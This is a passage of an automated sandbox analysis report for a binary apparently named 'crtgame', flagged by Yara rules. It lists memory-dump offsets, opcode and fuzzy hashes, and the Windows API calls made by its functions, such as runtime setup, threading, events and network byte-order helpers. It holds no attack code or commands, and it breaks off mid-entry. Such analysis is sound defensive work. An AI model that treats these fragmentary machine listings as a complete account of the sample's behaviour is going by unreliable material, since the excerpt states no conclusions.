                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID:
                                                                          • API String ID: 4293676635-0
                                                                          • Opcode ID: fca4701c70042df057de7989c50a086ac93ef158d70e40c9f090b0d71dd48218
                                                                          • Instruction ID: bdfe33545a62b6a7ede5f050ac1d1332f6270ed14a66154ac304823aa5578cf6
                                                                          • Opcode Fuzzy Hash: fca4701c70042df057de7989c50a086ac93ef158d70e40c9f090b0d71dd48218
                                                                          • Instruction Fuzzy Hash: 760190B1901B199FC718CF1AC64094AFBF9EF88710B15C5EED45A8B721E7B1AA40CF94
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BCDCC1
                                                                            • Part of subcall function 02BD354C: _malloc.LIBCMT ref: 02BD3564
                                                                            • Part of subcall function 02BCDEDD: __EH_prolog.LIBCMT ref: 02BCDEE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_malloc
                                                                          • String ID:
                                                                          • API String ID: 4254904621-0
                                                                          • Opcode ID: 870a2d30468532ab60f7c07969a7533a400f386f7ff3a64bc5d15fb1ea101bdb
                                                                          • Instruction ID: 3dbaaaa35faf4ed92e89592ac5f1c7b96ba7c997fd10aa8d81ed1a09bea2a752
                                                                          • Opcode Fuzzy Hash: 870a2d30468532ab60f7c07969a7533a400f386f7ff3a64bc5d15fb1ea101bdb
                                                                          • Instruction Fuzzy Hash: FBE0C2B1A4420BABCF1DDF68D80177E77A2EB44304F1085FDB809D2640EF708E008E41
                                                                          APIs
                                                                            • Part of subcall function 02BD565A: __getptd_noexit.LIBCMT ref: 02BD565B
                                                                            • Part of subcall function 02BD565A: __amsg_exit.LIBCMT ref: 02BD5668
                                                                            • Part of subcall function 02BD2E93: __getptd_noexit.LIBCMT ref: 02BD2E97
                                                                            • Part of subcall function 02BD2E93: __freeptd.LIBCMT ref: 02BD2EB1
                                                                            • Part of subcall function 02BD2E93: RtlExitUserThread.NTDLL(?,00000000,?,02BD2E73,00000000), ref: 02BD2EBA
                                                                          • __XcptFilter.LIBCMT ref: 02BD2E7F
                                                                            • Part of subcall function 02BD8794: __getptd_noexit.LIBCMT ref: 02BD8798
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                          • String ID:
                                                                          • API String ID: 1405322794-0
                                                                          • Opcode ID: bb65767cf30297b5580b2665993c22732637cf07e2bcac429f3cffcfd78b21aa
                                                                          • Instruction ID: 89941d8f9c674ede39558ee29dfbdddc0f4e29861cb51801d801b9ac27f6767c
                                                                          • Opcode Fuzzy Hash: bb65767cf30297b5580b2665993c22732637cf07e2bcac429f3cffcfd78b21aa
                                                                          • Instruction Fuzzy Hash: B0E0ECB5950600DFEB08BBA4D849FAD77A6AF44302F2005C9F1019B2A1EA74A9419F20
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BFA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BFA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bfa000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                          • Instruction ID: 72e5ac325ec36a25b28b8e6c8f7c0c4410d190e3ccd6618b47b1d938c3651ddc
                                                                          • Opcode Fuzzy Hash: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                          • Instruction Fuzzy Hash: 9711A2B210C3089FE3057E6DEC856BAB7E9EF84620F06492EE2C1C3600DA3165448697
                                                                          APIs
                                                                            • Part of subcall function 02BD1010: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02BD10B0
                                                                            • Part of subcall function 02BD1010: CloseHandle.KERNEL32(00000000), ref: 02BD10C5
                                                                            • Part of subcall function 02BD1010: ResetEvent.KERNEL32(00000000), ref: 02BD10CF
                                                                            • Part of subcall function 02BD1010: CloseHandle.KERNEL32(00000000,C2070DBA), ref: 02BD1104
                                                                          • TlsSetValue.KERNEL32(00000025,?), ref: 02BD1BAA
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventHandle$OpenResetValue
                                                                          • String ID:
                                                                          • API String ID: 1556185888-0
                                                                          • Opcode ID: 4be22cba19a46ceebaf5fa5c6115f91594f204d6e08b620f0ac2f6f588ea5ee5
                                                                          • Instruction ID: 5c8bd760e0e72ed99523e085ab4b343a5d2bc5b326bb37843b2fc285ba7dba5a
                                                                          • Opcode Fuzzy Hash: 4be22cba19a46ceebaf5fa5c6115f91594f204d6e08b620f0ac2f6f588ea5ee5
                                                                          • Instruction Fuzzy Hash: EA01D471A00204ABD710CFACD845B9ABBB8EB057A0F104796F829D3680D73199008A94
                                                                          APIs
                                                                            • Part of subcall function 02BC9462: __EH_prolog.LIBCMT ref: 02BC9467
                                                                            • Part of subcall function 02BC9462: _Allocate.LIBCPMT ref: 02BC94BE
                                                                          • _memset.LIBCMT ref: 02BD0339
                                                                          • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02BD03A2
                                                                          • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02BD03AA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateErrorFormatH_prologLastMessage_memset
                                                                          • String ID: Unknown error$invalid string position
                                                                          • API String ID: 2731337147-1837348584
                                                                          • Opcode ID: 3a9501780436987094bdd318e5240823d72dff6e2d749945e0284c72a81c5369
                                                                          • Instruction ID: e211142271650ef742882b460ea9620e487954dfbfcb4fdb5802ddca791bd4d8
                                                                          • Opcode Fuzzy Hash: 3a9501780436987094bdd318e5240823d72dff6e2d749945e0284c72a81c5369
                                                                          • Instruction Fuzzy Hash: 8151CB706083418FE714EF24C880B6EBBE4EB98358F540DADF48197692E771E588CF92
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02BD4896,?,?,?,00000000), ref: 02BD8F2D
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 02BD8F36
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 0def1f1fe7d5559258ccb120fe55866b4c04947c50366873295a4a1431015de6
                                                                          • Instruction ID: c26325203d64ac08a781f709d22b3f4d803b05f820829b18ce9ebb89dcd12015
                                                                          • Opcode Fuzzy Hash: 0def1f1fe7d5559258ccb120fe55866b4c04947c50366873295a4a1431015de6
                                                                          • Instruction Fuzzy Hash: 60B09231484208EBCE412B91EC09B89BF28EB046A2F004850F60E4A0628F725421ABA2
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC24E6
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02BC24FC
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BC250E
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC256D
                                                                          • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02BC257F
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02BC2599
                                                                          • GetLastError.KERNEL32(?,7591DFB0), ref: 02BC25A2
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC25F0
                                                                          • InterlockedDecrement.KERNEL32(00000002), ref: 02BC262F
                                                                          • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02BC268E
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC2699
                                                                          • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02BC26AD
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02BC26BD
                                                                          • GetLastError.KERNEL32(?,7591DFB0), ref: 02BC26C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                          • String ID:
                                                                          • API String ID: 1213838671-0
                                                                          • Opcode ID: cedaf58af2c59fcf189e6a23e48f1f154c8a07050bce6ea602b07d1edd6242d9
                                                                          • Instruction ID: 07a9caff12448132a4d25a4dd180749d55354abb41e5841b50dab83aa8e8b9ae
                                                                          • Opcode Fuzzy Hash: cedaf58af2c59fcf189e6a23e48f1f154c8a07050bce6ea602b07d1edd6242d9
                                                                          • Instruction Fuzzy Hash: 8D613F71900209EFCB10DFA4D984AAEFBB9FF48354F1049AEE916E7241EB349945DF60
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC4533
                                                                            • Part of subcall function 02BD354C: _malloc.LIBCMT ref: 02BD3564
                                                                          • htons.WS2_32(?), ref: 02BC4594
                                                                          • htonl.WS2_32(?), ref: 02BC45B7
                                                                          • htonl.WS2_32(00000000), ref: 02BC45BE
                                                                          • htons.WS2_32(00000000), ref: 02BC4672
                                                                          • _sprintf.LIBCMT ref: 02BC4688
                                                                          • htons.WS2_32(?), ref: 02BC45DB
                                                                            • Part of subcall function 02BC90C0: __EH_prolog.LIBCMT ref: 02BC90C5
                                                                            • Part of subcall function 02BC90C0: RtlEnterCriticalSection.NTDLL(00000020), ref: 02BC9140
                                                                            • Part of subcall function 02BC90C0: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02BC915E
                                                                            • Part of subcall function 02BC1BA7: __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                            • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                            • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                            • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                            • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                            • Part of subcall function 02BCD87F: __EH_prolog.LIBCMT ref: 02BCD884
                                                                          • htonl.WS2_32(?), ref: 02BC48A7
                                                                          • htonl.WS2_32(00000000), ref: 02BC48AE
                                                                          • htonl.WS2_32(00000000), ref: 02BC48F3
                                                                          • htonl.WS2_32(00000000), ref: 02BC48FA
                                                                          • htons.WS2_32(?), ref: 02BC491A
                                                                          • htons.WS2_32(?), ref: 02BC4924
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
                                                                          • String ID:
                                                                          • API String ID: 725951905-0
                                                                          • Opcode ID: 0bf638e3ccb5b6c544e44d695592810e67b69211104744337ffee6a9509872e5
                                                                          • Instruction ID: ddbadfefe740597f6d18437e64f2a8bcc7bfa8037c145d1b0c1398787dc56c36
                                                                          • Opcode Fuzzy Hash: 0bf638e3ccb5b6c544e44d695592810e67b69211104744337ffee6a9509872e5
                                                                          • Instruction Fuzzy Hash: C0022771D00219EEDF15DFA4D854BEEBBB9AF09304F20409EE545A7280DB745A88DFA1
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC3428
                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02BC346B
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02BC3472
                                                                          • GetLastError.KERNEL32 ref: 02BC3486
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02BC34D7
                                                                          • RtlEnterCriticalSection.NTDLL(00000018), ref: 02BC34ED
                                                                          • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02BC3518
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                          • String ID: CancelIoEx$KERNEL32
                                                                          • API String ID: 2902213904-434325024
                                                                          • Opcode ID: a8cb8bf82bf553965ffccd43e5cf9a040e20fa4458473369ba0134eae4cc2721
                                                                          • Instruction ID: 2550b8268f9d9e6b471282725f52778edd7663150c7da6efb978e848b5186e7d
                                                                          • Opcode Fuzzy Hash: a8cb8bf82bf553965ffccd43e5cf9a040e20fa4458473369ba0134eae4cc2721
                                                                          • Instruction Fuzzy Hash: 13318F71900209DFDB11EF64D8846AEBBF9FF48315F1489D9E8059B242DB70D901CFA1
                                                                          APIs
                                                                          • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02BD10B0
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BD10C5
                                                                          • ResetEvent.KERNEL32(00000000), ref: 02BD10CF
                                                                          • CloseHandle.KERNEL32(00000000,C2070DBA), ref: 02BD1104
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C2070DBA), ref: 02BD117A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BD118F
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventHandle$CreateOpenReset
                                                                          • String ID:
                                                                          • API String ID: 1285874450-0
                                                                          • Opcode ID: f21abaf723f546f1643cb3fead93a6e6fcec1beb40ca77aaf360f8a1f99bbc67
                                                                          • Instruction ID: 44d0f1970634c80fcd1ade08035caf58ba3cd5b7c9a4e1ee0f469820710a9cce
                                                                          • Opcode Fuzzy Hash: f21abaf723f546f1643cb3fead93a6e6fcec1beb40ca77aaf360f8a1f99bbc67
                                                                          • Instruction Fuzzy Hash: 30415F70D14348ABDF20DFE8C844BEDBBB8EF05764F504259E829EB281E7709945CB61
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC20AC
                                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02BC20CD
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC20D8
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02BC213E
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02BC217A
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02BC2187
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                          • String ID:
                                                                          • API String ID: 1171374749-0
                                                                          • Opcode ID: 61b370fc6e877e0343cf397e9bceca8c0bc7f2d3107e04ffdd17704dec4b4fc1
                                                                          • Instruction ID: 9657f63ff1272d2ad7d9db4d1fc2336d2eb38640d14a41a1be3bd6e05be3c18f
                                                                          • Opcode Fuzzy Hash: 61b370fc6e877e0343cf397e9bceca8c0bc7f2d3107e04ffdd17704dec4b4fc1
                                                                          • Instruction Fuzzy Hash: 704116715047019FC321DF25D884A6BBBF9FBC8664F104A5EB8AA93251DB30E545CFA2
                                                                          APIs
                                                                            • Part of subcall function 02BD18D0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02BD112E,?,?), ref: 02BD18FF
                                                                            • Part of subcall function 02BD18D0: CloseHandle.KERNEL32(00000000,?,?,02BD112E,?,?), ref: 02BD1914
                                                                            • Part of subcall function 02BD18D0: SetEvent.KERNEL32(00000000,02BD112E,?,?), ref: 02BD1927
                                                                          • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02BD10B0
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BD10C5
                                                                          • ResetEvent.KERNEL32(00000000), ref: 02BD10CF
                                                                          • CloseHandle.KERNEL32(00000000,C2070DBA), ref: 02BD1104
                                                                          • __CxxThrowException@8.LIBCMT ref: 02BD1135
                                                                            • Part of subcall function 02BD3F5A: RaiseException.KERNEL32(?,?,?,02BF0F6C,?,00000400,?,?,?,02BD359C,?,02BF0F6C,00000000,00000001), ref: 02BD3FAF
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C2070DBA), ref: 02BD117A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BD118F
                                                                            • Part of subcall function 02BD1610: GetCurrentProcessId.KERNEL32(?), ref: 02BD1669
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,C2070DBA), ref: 02BD119F
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                          • String ID:
                                                                          • API String ID: 2227236058-0
                                                                          • Opcode ID: c94edc3f47c896a3891f57e4af254fe791c2da64fb31d9e7a32e2ecb39e9d51b
                                                                          • Instruction ID: 26ef030118aa149fbfb5397c1c52746a0074af89ce5729f89f18ea8a5c9365c4
                                                                          • Opcode Fuzzy Hash: c94edc3f47c896a3891f57e4af254fe791c2da64fb31d9e7a32e2ecb39e9d51b
                                                                          • Instruction Fuzzy Hash: 01317E75D10349ABDF20DBE8DC45BEDB7B9EF05324F5402A9E82CEB281E7209945CB61
                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 02BD5794
                                                                            • Part of subcall function 02BD7F02: RtlEncodePointer.NTDLL(00000000), ref: 02BD7F05
                                                                            • Part of subcall function 02BD7F02: __initp_misc_winsig.LIBCMT ref: 02BD7F20
                                                                            • Part of subcall function 02BD7F02: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02BD8C81
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02BD8C95
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02BD8CA8
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02BD8CBB
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02BD8CCE
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02BD8CE1
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02BD8CF4
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02BD8D07
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02BD8D1A
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02BD8D2D
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02BD8D40
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02BD8D53
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02BD8D66
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02BD8D79
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02BD8D8C
                                                                            • Part of subcall function 02BD7F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02BD8D9F
                                                                          • __mtinitlocks.LIBCMT ref: 02BD5799
                                                                          • __mtterm.LIBCMT ref: 02BD57A2
                                                                            • Part of subcall function 02BD580A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02BD833A
                                                                            • Part of subcall function 02BD580A: RtlDeleteCriticalSection.NTDLL(02BF3978), ref: 02BD8363
                                                                          • __calloc_crt.LIBCMT ref: 02BD57C7
                                                                          • __initptd.LIBCMT ref: 02BD57E9
                                                                          • GetCurrentThreadId.KERNEL32 ref: 02BD57F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                          • String ID:
                                                                          • API String ID: 1500305132-0
                                                                          • Opcode ID: b30d59589faaa9f077e3e54f6fb7f94d94287e65d01130294fad6b81aa3ac84b
                                                                          • Instruction ID: 2bd58acbf3b6c4cdf0a9f7e54234589a0314f374f5cb52925ce4eda9824d7104
                                                                          • Opcode Fuzzy Hash: b30d59589faaa9f077e3e54f6fb7f94d94287e65d01130294fad6b81aa3ac84b
                                                                          • Instruction Fuzzy Hash: 60F024325983115EE6747A787C017CA27C6EF01776B7006F9E010C60C4FF12A0420B60
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02BD2E73,00000000), ref: 02BD2EDB
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02BD2EE2
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 02BD2EEE
                                                                          • RtlDecodePointer.NTDLL(00000001), ref: 02BD2F0B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoInitialize$combase.dll
                                                                          • API String ID: 3489934621-340411864
                                                                          • Opcode ID: 603548d06546987238b3a0d3f6429b1a7ce29be5e979928bce8c53ad8f8ba07b
                                                                          • Instruction ID: 5e06fa115116ce63733846ae0da182bed4b419898d0c6e1bafa1afe32f787485
                                                                          • Opcode Fuzzy Hash: 603548d06546987238b3a0d3f6429b1a7ce29be5e979928bce8c53ad8f8ba07b
                                                                          • Instruction Fuzzy Hash: F6E01A70ED0380EBEF605F70EC49B4437A9A700782F605DA4FA12EB491DFB544A49F10
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02BD2EB0), ref: 02BD2FB0
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02BD2FB7
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 02BD2FC2
                                                                          • RtlDecodePointer.NTDLL(02BD2EB0), ref: 02BD2FDD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoUninitialize$combase.dll
                                                                          • API String ID: 3489934621-2819208100
                                                                          • Opcode ID: 01e9920e4206b4893a72ee3e0a141f0e6197df19fb4e789133009439cf60b1a9
                                                                          • Instruction ID: b66f5ceb15a0de0f8ff290f22c28a3c9659e45be51cec47468f5505e61c4ef89
                                                                          • Opcode Fuzzy Hash: 01e9920e4206b4893a72ee3e0a141f0e6197df19fb4e789133009439cf60b1a9
                                                                          • Instruction Fuzzy Hash: 40E09270DC0304EBEF905F70AD4DB547BA9A714781F604D94FA12EB4A5EFB580A0DB15
                                                                          APIs
                                                                          • TlsGetValue.KERNEL32(00000025,C2070DBA,?,?,?,?,00000000,02BE64B8,000000FF,02BD1BCA), ref: 02BD196A
                                                                          • TlsSetValue.KERNEL32(00000025,02BD1BCA,?,?,00000000), ref: 02BD19D7
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BD1A01
                                                                          • HeapFree.KERNEL32(00000000), ref: 02BD1A04
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: HeapValue$FreeProcess
                                                                          • String ID:
                                                                          • API String ID: 1812714009-0
                                                                          • Opcode ID: 1d13b0f70136bd23b78d0caccc0ebbf38db27909370b445994f7b7664b29eb61
                                                                          • Instruction ID: 8a021d6411cf9a7f86c462819e43a32f8ddd278d05a22c3cf20c52cbd007fcc4
                                                                          • Opcode Fuzzy Hash: 1d13b0f70136bd23b78d0caccc0ebbf38db27909370b445994f7b7664b29eb61
                                                                          • Instruction Fuzzy Hash: CB51DF35A143449FDB20DF6DD444B96BBE4EB457A4F098699E87D9B290E734EC00CBA0
                                                                          APIs
                                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 02BE5190
                                                                          • __FindPESection.LIBCMT ref: 02BE51AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FindHandlersScopeSectionTableValidate
                                                                          • String ID:
                                                                          • API String ID: 876702719-0
                                                                          • Opcode ID: 3a73fe9ef65b8ff92e07e258f8bdc8316e62f61db87a60ab2935f585f4c45dcb
                                                                          • Instruction ID: 31c3f2807d09a66df4a17ab7a9d74d6c13810b16a61dd7021cb79d633060555c
                                                                          • Opcode Fuzzy Hash: 3a73fe9ef65b8ff92e07e258f8bdc8316e62f61db87a60ab2935f585f4c45dcb
                                                                          • Instruction Fuzzy Hash: C5A18E71A006158FCF20CF58D980BADB7B5FB44328F9586E9D947AB351EB35E841CBA0
                                                                          APIs
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BC1CB1
                                                                          • CloseHandle.KERNEL32(?), ref: 02BC1CBA
                                                                          • InterlockedExchangeAdd.KERNEL32(02BF74EC,00000000), ref: 02BC1CC6
